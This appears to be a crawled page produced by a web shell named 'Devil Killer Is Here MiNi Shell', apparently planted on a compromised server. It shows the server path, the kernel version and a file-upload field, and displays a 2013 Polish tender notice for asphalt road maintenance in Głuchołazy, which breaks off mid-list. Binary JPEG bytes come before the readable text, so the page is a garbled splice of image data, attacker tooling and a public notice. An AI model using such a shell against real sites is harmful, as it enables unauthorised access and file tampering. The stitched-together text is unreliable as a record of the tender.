JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130123/32738-N-2013.html

<p class="kh_header"><b>Głuchołazy: KONSERWACJA CZĄSTKOWA NAWIERZCHNI ASFALTOWYCH DRÓG GMINY GŁUCHOŁAZY W LATACH 2013-2015</b><br>
<b>Numer ogłoszenia: 32738 - 2013; data zamieszczenia: 23.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Głuchołazy , Rynek 15, 48-340 Głuchołazy, woj. opolskie, tel. 77 4092100, faks 77 4092101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glucholazy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KONSERWACJA CZĄSTKOWA NAWIERZCHNI ASFALTOWYCH DRÓG GMINY GŁUCHOŁAZY W LATACH 2013-2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest: 
KONSERWACJA CZĄSTKOWA NAWIERZCHNI ASFALTOWYCH DRÓG GMINY GŁUCHOŁAZY W OKRESIE 2013-2015
1.Część I- Konserwacja nawierzchni asfaltowych emulsją i grysami przy użyciu remonterów

Zakres obejmuje konserwację nawierzchni asfaltowych emulsją i grysami przy użyciu remonterów. Przewidywana ilość materiałów do wbudowania - 940t
Zakres i sposób wykonania przedmiotowej konserwacji ujęty został w szczegółowej specyfikacji wykonania  i odbioru prac dla części I- zał. nr 9 do SIWZ
Rozliczenie prac odbędzie się w oparciu o pomiar sporządzony wg rzeczywistej ilości ton wbudowanego materiału potwierdzonej przez upoważnioną przez Zamawiającego osobę. Wykonawca określi cenę jednostkową za wbudowanie 1 tony przy wykonaniu remontu cząstkowego nawierzchni drogi na okres ważności umowy i  cena nie będzie podlegała zmianom. Cena wbudowania 1 tony materiału w ramach konserwacji cząstkowej nawierzchni obejmuje wszystkie niezbędne składniki kalkulacyjne wymagane dla wykonania n/w robót:
-prace pomiarowe i roboty przygotowawcze,
-oznakowanie robót,
-zebranie zanieczyszczeń i niezwiązanych ziaren podbudowy i nawierzchni, oderwanych w czasie oczyszczenia na pojazdy i wywiezienia ich na składowisko
-dostarczenie materiałów i sprzętu na budowę,
-wykonanie naprawy zgodnie z SST,
-pomiary i badania laboratoryjne,
-odtransportowanie sprzętu z placu budowy


Okres gwarancji - minimum 12 miesięcy, licząc od dnia podpisania protokołu rocznego  odbioru prac w każdym roku objętym zamówieniem.

2. Część II-  Konserwacja nawierzchni jezdni przy metodzie na zimno/na ciepło
Zakres obejmuje konserwację nawierzchni jezdni przy metodzie - remont nawierzchni drogowej na zimno. Przewidywana powierzchnia do wbudowania - 100m2 przy średniej grubości asfaltu 4cm. 
Zakres obejmuje konserwację nawierzchni jezdni przy metodzie - remont nawierzchni drogowej na gorąco. Przewidywana powierzchnia do wbudowania - 500m2 przy średniej grubości asfaltu 4cm.. 
 Masy bitumiczne na gorąco wyprodukowane muszą być według recept zatwierdzanych przez Zamawiającego wg normy PN - S - 96025 : 2000. Dostosowane do nawierzchni remontowanej, zalecana mieszanka AC11F D50/70 KR 3-4
Całkowity zakres i sposób wykonania przedmiotowej konserwacji ujęty został w  szczegółowej specyfikacji  części II - zał. nr 10 do SIWZ
Rozliczenie prac odbędzie się w oparciu o pomiar sporządzony wg rzeczywistej ilości metrów kwadratowych (m2) wbudowanego materiału potwierdzonej przez upoważnioną przez Zamawiającego osobę. Wykonawca określi cenę jednostkową za wbudowanie jednego metra kwadratowego (1m2) przy wykonaniu remontu cząstkowego nawierzchni drogi na okres ważności umowy i nie będzie podlegała zmianom. Cena wbudowania jednego metra kwadratowego (1m2) materiału w ramach konserwacji cząstkowej nawierzchni obejmuje wszystkie niezbędne składniki kalkulacyjne wymagane dla wykonania n/w robót:
-prace pomiarowe i roboty przygotowawcze,
-oznakowanie robót,
-zebranie zanieczyszczeń i niezwiązanych ziaren podbudowy i nawierzchni, oderwanych w czasie oczyszczenia na pojazdy i wywiezienia ich na składowisko
-dostarczenie materiałów i sprzętu na budowę,
-wykonanie naprawy zgodnie z SST,
-pomiary i badania laboratoryjne,
-odtransportowanie sprzętu z placu budowy

Okres gwarancji - minimum 12 miesięcy, licząc od dnia podpisania protokołu rocznego  odbioru  prac w każdym roku objętym zamówieniem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających , o których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego. Zamówienia uzupełniające są przewidziane tylko dla I części zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9, 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności Wykonawcy muszą (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne posiadanie wiedzy i doświadczenia):wykazać:
a) dla część I : że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali usługę  o charakterze i złożoności podobnej do przedmiotu niniejszego zamówienia, tj. wykonali  min. 1 usługę, polegającą na wbudowaniu, co najmniej 100 ton materiału emulsją i grysami przy użyciu remontera ,  z podaniem rodzaju usługi,  ilości ton wbudowanego wymaganego wyżej materiału i wartości brutto  wykonania usługi , daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane należycie (referencje).
W celu potwierdzenia spełnienia niniejszego warunku, Wykonawcy zobowiązani są przedłożyć wykaz wykonanych usług z podaniem rodzaju usługi, ilości ton wbudowanego wymaganego  materiału (emulsja i grys) i wartości brutto  wykonania usługi, daty i miejsca wykonania,  sporządzony według wzoru stanowiącego Załącznik Nr 4 do SIWZ - Wykaz wykonanych usług dla  części I zamówienia , oraz dokumenty potwierdzające, że te usługi zostały wykonane należycie (np.: wystawione bezusterkowe protokoły odbioru lub przedstawienie stosownego potwierdzenia odbiorcy usługi).

b) dla część II: że w  okresie ostatnich trzech lat przed upływem terminu składania ofert a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali  usługę  o charakterze i złożoności podobnej do przedmiotu niniejszego zamówienia tj. wykonali  co najmniej trzy usługi polegające na wykonaniu konserwacji nawierzchni drogowych metodą na gorąco o łącznej powierzchni 100m2  z podaniem  rodzaju metody konserwacji nawierzchni,  powierzchni konserwacji , wartości brutto, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane należycie (referencje).

W celu potwierdzenia spełnienia niniejszego warunku, Wykonawcy zobowiązani są przedłożyć wykaz wykonanych usług z podaniem rodzaju metody konserwacji nawierzchni,  powierzchni konserwacji, wartości brutto, daty i miejsca wykonania  usługi, sporządzony według wzoru stanowiącego Załącznik Nr 6 do SIWZ - Wykaz wykonanych usług dla  części II zamówienia , oraz dokumenty potwierdzające, że te usługi zostały wykonane należycie (np.: wystawione bezusterkowe protokoły odbioru lub przedstawienie stosownego potwierdzenia odbiorcy usługi).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności Wykonawcy muszą wykazać (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne posiadanie wiedzy i doświadczenia)  dysponowaniem m. in.:

a) dla części I: jednym remonterem wprowadzającym pod ciśnieniem kruszywo jednocześnie z kationową emulsją w oczyszczone sprężonym powietrzem uszkodzenia. 
Remonter musi być wyposażony w wysokowydajną dmuchawę do czyszczenia wybojów, silnik o mocy powyżej 50kW napędzający pompę hydrauliczną o wydajności powyżej 65 l/ min przy obrotach 2000 obr/min i system pneumatyczny z dmuchawą do usuwania zanieczyszczeń i nadawania ziarnom grysu (frakcji od 2 do 4 mm, od 4 do 6,3 mm lub od 8 do 12 mm) dużej prędkości przy ich wyrzucaniu z dyszy razem z emulsją.
W celu potwierdzenia spełnienia niniejszego warunku, Wykonawcy zobowiązani są przedłożyć wykaz niezbędnych do wykonania usługi urządzeń technicznych, sporządzony według wzoru stanowiącego Załącznik Nr 5 do SIWZ - Wykaz niezbędnych do wykonania usługi urządzeń technicznych dla części I zamówienia , wraz z informacją o podstawie dysponowania tymi zasobami.
 
 b) dla części II: dysponowaniem :
        -  walcem  wibracyjnym 2,5t (min. 1 szt.), 
        - piłą do mas bitumicznych   (min. 1 szt.),
        -  frezarką do mas bitumicznych 0,5m (min. 1 szt.),
        -  skraplarką do bitumu lub innym pojazdem skraplający (min 1szt),
        - środkiem do transportu materiałów kamiennych i masy bitumicznej(min. 1 szt).

 W celu potwierdzenia spełnienia niniejszego warunku, Wykonawcy zobowiązani są przedłożyć wykaz niezbędnych do wykonania usługi urządzeń technicznych, sporządzony według wzoru stanowiącego Załącznik Nr 7 do SIWZ - Wykaz niezbędnych do wykonania usługi urządzeń technicznych dla części II zamówienia , wraz z informacją o podstawie dysponowania tymi zasobami.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)formularz Oferty, sporządzony na podstawie wzoru stanowiącego Załącznik Nr 1 
do  SIWZ, 
2)stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru,
3) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamowienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy 
w sprawie niniejszego zamówienia publicznego, 
4)  pozostałe dokumenty wymienione w pkt. 10  SIWZ,
5) w przypadku polegania Wykonawcy na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, Wykonawca zobowiązany jest dołączyć do oferty:
-pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówieniaw -przypadku, gdy podmioty trzecie będą brały udział w realizacji części zamówienia, Wykonawca zobowiązany jest przedstawić dokumenty, o których mowa w pkt. 9.3 SIWZ w zakresie dotyczącym tych podmiotów</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza możliwość dokonywania nieistotnych zmian zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy.
2.	Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy 
w stosunku do treści oferty, oraz określa warunki takiej zmiany w przypadku:
a)	wszystkich zamian obiektywnie ocenianych, jako korzystne dla Zamawiającego w sytuacji nieprzewidzianej i niezawinionej przez strony, której wystąpienia strony nie mogły przewidzieć pomimo zachowania należytej staranności.
2)	pozostałe zmiany:
a) zmiany personalnej osób uprawnionych do sprawowania samodzielnych funkcji technicznych 
z branż wymaganych przez Zamawiającego, która może nastąpić za zgodą Zamawiającego, na pisemny wniosek Wykonawcy lub na żądanie Zamawiającego wskazując powody i konieczność dokonania takiej zmiany, a przedstawiony do zmiany we wniosku kandydat na powyższe stanowiska musi spełniać odpowiednio warunki udziału w niniejszym postępowaniu, zgodnie z SIWZ 
b) Zamawiający  na pisemny wniosek Wykonawcy dopuszcza zmianę Podwykonawców w trakcie realizacji zamówienia. Zamawiającemu przysługuje również prawo żądania od Wykonawcy zmiany Podwykonawcy, jeżeli ten realizuje roboty w sposób wadliwy, niezgodny z założeniami niniejszej Umowy i przepisami obowiązującego prawa.  W przypadku gdy Wykonawca polegał na zasobach Podwykonawcy(wiedzy, doświadczeniu, potencjale technicznym i osobach lub zdolnościach finansowych  innych podmiotów) w celu wykazania spełnienia warunku udziału w postępowaniu o udzielenie zamówienia, zmiana Podwykonawcy  jest dopuszczalna, gdy nowy Podwykonawca spełnia warunki podane w specyfikacji istotnych warunków zamówienia
c) Zmiany terminu wykonania umowy: w przypadku niekorzystnych warunków atmosferycznych uniemożliwiających prowadzenie prac, prace mogą zostać przerwane, a termin zakończenia prac może zostać przesunięty o czas przerwy w pracach udokumentowany przez koordynatora prac.
d) w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony.
e) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.

UWAGA ZAMAWIAJĄCEGO: Zapis pkt. 2. b) dotyczy wyłącznie umowy podstawowej, zawartej 
na podstawie oferty przetargowej, w której Wykonawca zapewnił udział podwykonawców.
3.  Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Powyższe zmiany do umowy winny być wprowadzone poprzez zmianę do umowy - aneks. Nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://gmina.glucholazy.sisco.info/?przetargi=1&rok=2013<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Głuchołazach ul. Rynek 15, 48-340 Głuchołazy, pokój nr 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2013 godzina 10:30, miejsce: Urząd Miejski w Głuchołazach ul. Rynek 15, 48-340 Głuchołazy, sekretariat pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Konserwacja nawierzchni asfaltowych emulsją i grysami przy użyciu remonterów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I- Konserwacja nawierzchni asfaltowych emulsją i grysami przy użyciu remonterów.

Zakres obejmuje konserwację nawierzchni asfaltowych emulsją i grysami przy użyciu remonterów. Przewidywana ilość materiałów do wbudowania - 940t
Zakres i sposób wykonania przedmiotowej konserwacji ujęty został w szczegółowej specyfikacji wykonania  i odbioru prac dla części I- zał. nr 9 do SIWZ
Rozliczenie prac odbędzie się w oparciu o pomiar sporządzony wg rzeczywistej ilości ton wbudowanego materiału potwierdzonej przez upoważnioną przez Zamawiającego osobę. Wykonawca określi cenę jednostkową za wbudowanie 1 tony przy wykonaniu remontu cząstkowego nawierzchni drogi na okres ważności umowy i  cena nie będzie podlegała zmianom. Cena wbudowania 1 tony materiału w ramach konserwacji cząstkowej nawierzchni obejmuje wszystkie niezbędne składniki kalkulacyjne wymagane dla wykonania n/w robót:
-prace pomiarowe i roboty przygotowawcze,
-oznakowanie robót,
-zebranie zanieczyszczeń i niezwiązanych ziaren podbudowy i nawierzchni, oderwanych w czasie oczyszczenia na pojazdy i wywiezienia ich na składowisko
-dostarczenie materiałów i sprzętu na budowę,
-wykonanie naprawy zgodnie z SST,
-pomiary i badania laboratoryjne,
-odtransportowanie sprzętu z placu budowy
Okres gwarancji - minimum 12 miesięcy, licząc od dnia podpisania protokołu rocznego  odbioru prac w każdym roku objętym zamówieniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9, 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwacja nawierzchni jezdni przy metodzie na zimno/na ciepło.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres obejmuje konserwację nawierzchni jezdni przy metodzie - remont nawierzchni drogowej na zimno. Przewidywana powierzchnia do wbudowania - 100m2 przy średniej grubości asfaltu 4cm. 
Zakres obejmuje konserwację nawierzchni jezdni przy metodzie - remont nawierzchni drogowej na gorąco. Przewidywana powierzchnia do wbudowania - 500m2 przy średniej grubości asfaltu 4cm.. 
 Masy bitumiczne na gorąco wyprodukowane muszą być według recept zatwierdzanych przez Zamawiającego wg normy PN - S - 96025 : 2000. Dostosowane do nawierzchni remontowanej, zalecana mieszanka AC11F D50/70 KR 3-4

Całkowity zakres i sposób wykonania przedmiotowej konserwacji ujęty został w  szczegółowej specyfikacji  części II - zał. nr 10 do SIWZ

Rozliczenie prac odbędzie się w oparciu o pomiar sporządzony wg rzeczywistej ilości metrów kwadratowych (m2) wbudowanego materiału potwierdzonej przez upoważnioną przez Zamawiającego osobę. Wykonawca określi cenę jednostkową za wbudowanie jednego metra kwadratowego (1m2) przy wykonaniu remontu cząstkowego nawierzchni drogi na okres ważności umowy i nie będzie podlegała zmianom. Cena wbudowania jednego metra kwadratowego (1m2) materiału w ramach konserwacji cząstkowej nawierzchni obejmuje wszystkie niezbędne składniki kalkulacyjne wymagane dla wykonania n/w robót:
-prace pomiarowe i roboty przygotowawcze,
-oznakowanie robót,
-zebranie zanieczyszczeń i niezwiązanych ziaren podbudowy i nawierzchni, oderwanych w czasie oczyszczenia na pojazdy i wywiezienia ich na składowisko
-dostarczenie materiałów i sprzętu na budowę,
-wykonanie naprawy zgodnie z SST,
